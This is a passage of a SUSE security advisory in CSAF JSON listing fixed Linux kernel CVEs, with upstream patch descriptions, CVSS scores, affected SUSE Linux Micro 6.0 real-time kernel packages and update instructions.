"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68746"
},
{
"cve": "CVE-2025-68750",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68750"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: potential integer overflow in usbg_make_tpg()\n\nThe variable tpgt in usbg_make_tpg() is defined as unsigned long and is\nassigned to tpgt-\u003etport_tpgt, which is defined as u16. This may cause an\ninteger overflow when tpgt is greater than USHRT_MAX (65535). I\nhaven\u0027t tried to trigger it myself, but it is possible to trigger it\nby calling usbg_make_tpg() with a large value for tpgt.\n\nI modified the type of tpgt to match tpgt-\u003etport_tpgt and adjusted the\nrelevant code accordingly.\n\nThis patch is similar to commit 59c816c1f24d (\"vhost/scsi: potential\nmemory corruption\").",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68750",
"url": "https://www.suse.com/security/cve/CVE-2025-68750"
},
{
"category": "external",
"summary": "SUSE Bug 1255814 for CVE-2025-68750",
"url": "https://bugzilla.suse.com/1255814"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68750"
},
{
"cve": "CVE-2025-68753",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68753"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: firewire-motu: add bounds check in put_user loop for DSP events\n\nIn the DSP event handling code, a put_user() loop copies event data.\nWhen the user buffer size is not aligned to 4 bytes, it could overwrite\nbeyond the buffer boundary.\n\nFix by adding a bounds check before put_user().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68753",
"url": "https://www.suse.com/security/cve/CVE-2025-68753"
},
{
"category": "external",
"summary": "SUSE Bug 1256238 for CVE-2025-68753",
"url": "https://bugzilla.suse.com/1256238"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68753"
},
{
"cve": "CVE-2025-68757",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68757"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/vgem-fence: Fix potential deadlock on release\n\nA timer that expires a vgem fence automatically in 10 seconds is now\nreleased with timer_delete_sync() from fence-\u003eops.release() called on last\ndma_fence_put(). In some scenarios, it can run in IRQ context, which is\nnot safe unless TIMER_IRQSAFE is used. One potentially risky scenario was\ndemonstrated in Intel DRM CI trybot, BAT run on machine bat-adlp-6, while\nworking on new IGT subtests syncobj_timeline@stress-* as user space\nreplacements of some problematic test cases of a dma-fence-chain selftest\n[1].\n\n[117.004338] ================================\n[117.004340] WARNING: inconsistent lock state\n[117.004342] 6.17.0-rc7-CI_DRM_17270-g7644974e648c+ #1 Tainted: G S U\n[117.004346] --------------------------------\n[117.004347] inconsistent {HARDIRQ-ON-W} -\u003e {IN-HARDIRQ-W} usage.\n[117.004349] swapper/0/0 [HC1[1]:SC1[1]:HE0:SE0] takes:\n[117.004352] ffff888138f86aa8 ((\u0026fence-\u003etimer)){?.-.}-{0:0}, at: __timer_delete_sync+0x4b/0x190\n[117.004361] {HARDIRQ-ON-W} state was registered at:\n[117.004363] lock_acquire+0xc4/0x2e0\n[117.004366] call_timer_fn+0x80/0x2a0\n[117.004368] __run_timers+0x231/0x310\n[117.004370] run_timer_softirq+0x76/0xe0\n[117.004372] handle_softirqs+0xd4/0x4d0\n[117.004375] __irq_exit_rcu+0x13f/0x160\n[117.004377] irq_exit_rcu+0xe/0x20\n[117.004379] sysvec_apic_timer_interrupt+0xa0/0xc0\n[117.004382] asm_sysvec_apic_timer_interrupt+0x1b/0x20\n[117.004385] cpuidle_enter_state+0x12b/0x8a0\n[117.004388] cpuidle_enter+0x2e/0x50\n[117.004393] call_cpuidle+0x22/0x60\n[117.004395] do_idle+0x1fd/0x260\n[117.004398] cpu_startup_entry+0x29/0x30\n[117.004401] start_secondary+0x12d/0x160\n[117.004404] common_startup_64+0x13e/0x141\n[117.004407] irq event stamp: 2282669\n[117.004409] hardirqs last enabled at (2282668): [\u003cffffffff8289db71\u003e] _raw_spin_unlock_irqrestore+0x51/0x80\n[117.004414] hardirqs last disabled at (2282669): [\u003cffffffff82882021\u003e] sysvec_irq_work+0x11/0xc0\n[117.004419] softirqs last enabled at (2254702): [\u003cffffffff8289fd00\u003e] __do_softirq+0x10/0x18\n[117.004423] softirqs last disabled at (2254725): [\u003cffffffff813d4ddf\u003e] __irq_exit_rcu+0x13f/0x160\n[117.004426]\nother info that might help us debug this:\n[117.004429] Possible unsafe locking scenario:\n[117.004432] CPU0\n[117.004433] ----\n[117.004434] lock((\u0026fence-\u003etimer));\n[117.004436] \u003cInterrupt\u003e\n[117.004438] lock((\u0026fence-\u003etimer));\n[117.004440]\n *** DEADLOCK ***\n[117.004443] 1 lock held by swapper/0/0:\n[117.004445] #0: ffffc90000003d50 ((\u0026fence-\u003etimer)){?.-.}-{0:0}, at: call_timer_fn+0x7a/0x2a0\n[117.004450]\nstack backtrace:\n[117.004453] CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Tainted: G S U 6.17.0-rc7-CI_DRM_17270-g7644974e648c+ #1 PREEMPT(voluntary)\n[117.004455] Tainted: [S]=CPU_OUT_OF_SPEC, [U]=USER\n[117.004455] Hardware name: Intel Corporation Alder Lake Client Platform/AlderLake-P DDR4 RVP, BIOS RPLPFWI1.R00.4035.A00.2301200723 01/20/2023\n[117.004456] Call Trace:\n[117.004456] \u003cIRQ\u003e\n[117.004457] dump_stack_lvl+0x91/0xf0\n[117.004460] dump_stack+0x10/0x20\n[117.004461] print_usage_bug.part.0+0x260/0x360\n[117.004463] mark_lock+0x76e/0x9c0\n[117.004465] ? register_lock_class+0x48/0x4a0\n[117.004467] __lock_acquire+0xbc3/0x2860\n[117.004469] lock_acquire+0xc4/0x2e0\n[117.004470] ? __timer_delete_sync+0x4b/0x190\n[117.004472] ? __timer_delete_sync+0x4b/0x190\n[117.004473] __timer_delete_sync+0x68/0x190\n[117.004474] ? __timer_delete_sync+0x4b/0x190\n[117.004475] timer_delete_sync+0x10/0x20\n[117.004476] vgem_fence_release+0x19/0x30 [vgem]\n[117.004478] dma_fence_release+0xc1/0x3b0\n[117.004480] ? dma_fence_release+0xa1/0x3b0\n[117.004481] dma_fence_chain_release+0xe7/0x130\n[117.004483] dma_fence_release+0xc1/0x3b0\n[117.004484] ? _raw_spin_unlock_irqrestore+0x27/0x80\n[117.004485] dma_fence_chain_irq_work+0x59/0x80\n[117.004487] irq_work_single+0x75/0xa0\n[117.004490] irq_work_r\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68757",
"url": "https://www.suse.com/security/cve/CVE-2025-68757"
},
{
"category": "external",
"summary": "SUSE Bug 1255943 for CVE-2025-68757",
"url": "https://bugzilla.suse.com/1255943"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68757"
},
{
"cve": "CVE-2025-68758",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68758"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbacklight: led-bl: Add devlink to supplier LEDs\n\nLED Backlight is a consumer of one or multiple LED class devices, but\ndevlink is currently unable to create correct supplier-producer links when\nthe supplier is a class device. It creates instead a link where the\nsupplier is the parent of the expected device.\n\nOne consequence is that removal order is not correctly enforced.\n\nIssues happen for example with the following sections in a device tree\noverlay:\n\n // An LED driver chip\n pca9632@62 {\n compatible = \"nxp,pca9632\";\n reg = \u003c0x62\u003e;\n\n\t// ...\n\n addon_led_pwm: led-pwm@3 {\n reg = \u003c3\u003e;\n label = \"addon:led:pwm\";\n };\n };\n\n backlight-addon {\n compatible = \"led-backlight\";\n leds = \u003c\u0026addon_led_pwm\u003e;\n brightness-levels = \u003c255\u003e;\n default-brightness-level = \u003c255\u003e;\n };\n\nIn this example, the devlink should be created between the backlight-addon\n(consumer) and the pca9632@62 (supplier). Instead it is created between the\nbacklight-addon (consumer) and the parent of the pca9632@62, which is\ntypically the I2C bus adapter.\n\nOn removal of the above overlay, the LED driver can be removed before the\nbacklight device, resulting in:\n\n Unable to handle kernel NULL pointer dereference at virtual address 0000000000000010\n ...\n Call trace:\n led_put+0xe0/0x140\n devm_led_release+0x6c/0x98\n\nAnother way to reproduce the bug without any device tree overlays is\nunbinding the LED class device (pca9632@62) before unbinding the consumer\n(backlight-addon):\n\n echo 11-0062 \u003e/sys/bus/i2c/drivers/leds-pca963x/unbind\n echo ...backlight-dock \u003e/sys/bus/platform/drivers/led-backlight/unbind\n\nFix by adding a devlink between the consuming led-backlight device and the\nsupplying LED device, as other drivers and subsystems do as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68758",
"url": "https://www.suse.com/security/cve/CVE-2025-68758"
},
{
"category": "external",
"summary": "SUSE Bug 1255944 for CVE-2025-68758",
"url": "https://bugzilla.suse.com/1255944"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68758"
},
{
"cve": "CVE-2025-68759",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68759"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtl818x: Fix potential memory leaks in rtl8180_init_rx_ring()\n\nIn rtl8180_init_rx_ring(), memory is allocated for skb packets and DMA\nallocations in a loop. When an allocation fails, the previously\nsuccessful allocations are not freed on exit.\n\nFix that by jumping to err_free_rings label on error, which calls\nrtl8180_free_rx_ring() to free the allocations. Remove the free of\nrx_ring in rtl8180_init_rx_ring() error path, and set the freed\npriv-\u003erx_buf entry to null, to avoid double free.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68759",
"url": "https://www.suse.com/security/cve/CVE-2025-68759"
},
{
"category": "external",
"summary": "SUSE Bug 1255934 for CVE-2025-68759",
"url": "https://bugzilla.suse.com/1255934"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68759"
},
{
"cve": "CVE-2025-68764",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68764"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags\n\nWhen a filesystem is being automounted, it needs to preserve the\nuser-set superblock mount options, such as the \"ro\" flag.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68764",
"url": "https://www.suse.com/security/cve/CVE-2025-68764"
},
{
"category": "external",
"summary": "SUSE Bug 1255930 for CVE-2025-68764",
"url": "https://bugzilla.suse.com/1255930"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68764"
},
{
"cve": "CVE-2025-68765",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68765"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmt76: mt7615: Fix memory leak in mt7615_mcu_wtbl_sta_add()\n\nIn mt7615_mcu_wtbl_sta_add(), an skb sskb is allocated. If the\nsubsequent call to mt76_connac_mcu_alloc_wtbl_req() fails, the function\nreturns an error without freeing sskb, leading to a memory leak.\n\nFix this by calling dev_kfree_skb() on sskb in the error handling path\nto ensure it is properly released.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68765",
"url": "https://www.suse.com/security/cve/CVE-2025-68765"
},
{
"category": "external",
"summary": "SUSE Bug 1255931 for CVE-2025-68765",
"url": "https://bugzilla.suse.com/1255931"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68765"
},
{
"cve": "CVE-2025-68766",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68766"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nirqchip/mchp-eic: Fix error code in mchp_eic_domain_alloc()\n\nIf irq_domain_translate_twocell() sets \"hwirq\" to \u003e= MCHP_EIC_NIRQ (2) then\nit results in an out of bounds access.\n\nThe code checks for invalid values, but doesn\u0027t set the error code. Return\n-EINVAL in that case, instead of returning success.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68766",
"url": "https://www.suse.com/security/cve/CVE-2025-68766"
},
{
"category": "external",
"summary": "SUSE Bug 1255932 for CVE-2025-68766",
"url": "https://bugzilla.suse.com/1255932"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68766"
},
{
"cve": "CVE-2025-68768",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68768"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ninet: frags: flush pending skbs in fqdir_pre_exit()\n\nWe have been seeing occasional deadlocks on pernet_ops_rwsem since\nSeptember in NIPA. The stuck task was usually modprobe (often loading\na driver like ipvlan), trying to take the lock as a Writer.\nlockdep does not track readers for rwsems so the read wasn\u0027t obvious\nfrom the reports.\n\nOn closer inspection the Reader holding the lock was conntrack looping\nforever in nf_conntrack_cleanup_net_list(). Based on past experience\nwith occasional NIPA crashes I looked thru the tests which run before\nthe crash and noticed that the crash follows ip_defrag.sh. An immediate\nred flag. Scouring thru (de)fragmentation queues reveals skbs sitting\naround, holding conntrack references.\n\nThe problem is that since conntrack depends on nf_defrag_ipv6,\nnf_defrag_ipv6 will load first. Since nf_defrag_ipv6 loads first its\nnetns exit hooks run _after_ conntrack\u0027s netns exit hook.\n\nFlush all fragment queue SKBs during fqdir_pre_exit() to release\nconntrack references before conntrack cleanup runs. Also flush\nthe queues in timer expiry handlers when they discover fqdir-\u003edead\nis set, in case packet sneaks in while we\u0027re running the pre_exit\nflush.\n\nThe commit under Fixes is not exactly the culprit, but I think\npreviously the timer firing would eventually unblock the spinning\nconntrack.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68768",
"url": "https://www.suse.com/security/cve/CVE-2025-68768"
},
{
"category": "external",
"summary": "SUSE Bug 1256579 for CVE-2025-68768",
"url": "https://bugzilla.suse.com/1256579"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68768"
},
{
"cve": "CVE-2025-68770",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68770"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbnxt_en: Fix XDP_TX path\n\nFor XDP_TX action in bnxt_rx_xdp(), clearing of the event flags is not\ncorrect. __bnxt_poll_work() -\u003e bnxt_rx_pkt() -\u003e bnxt_rx_xdp() may be\nlooping within NAPI and some event flags may be set in earlier\niterations. In particular, if BNXT_TX_EVENT is set earlier indicating\nsome XDP_TX packets are ready and pending, it will be cleared if it is\nXDP_TX action again. Normally, we will set BNXT_TX_EVENT again when we\nsuccessfully call __bnxt_xmit_xdp(). But if the TX ring has no more\nroom, the flag will not be set. This will cause the TX producer to be\nahead but the driver will not hit the TX doorbell.\n\nFor multi-buf XDP_TX, there is no need to clear the event flags and set\nBNXT_AGG_EVENT. The BNXT_AGG_EVENT flag should have been set earlier in\nbnxt_rx_pkt().\n\nThe visible symptom of this is that the RX ring associated with the\nTX XDP ring will eventually become empty and all packets will be dropped.\nBecause this condition will cause the driver to not refill the RX ring\nseeing that the TX ring has forever pending XDP_TX packets.\n\nThe fix is to only clear BNXT_RX_EVENT when we have successfully\ncalled __bnxt_xmit_xdp().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68770",
"url": "https://www.suse.com/security/cve/CVE-2025-68770"
},
{
"category": "external",
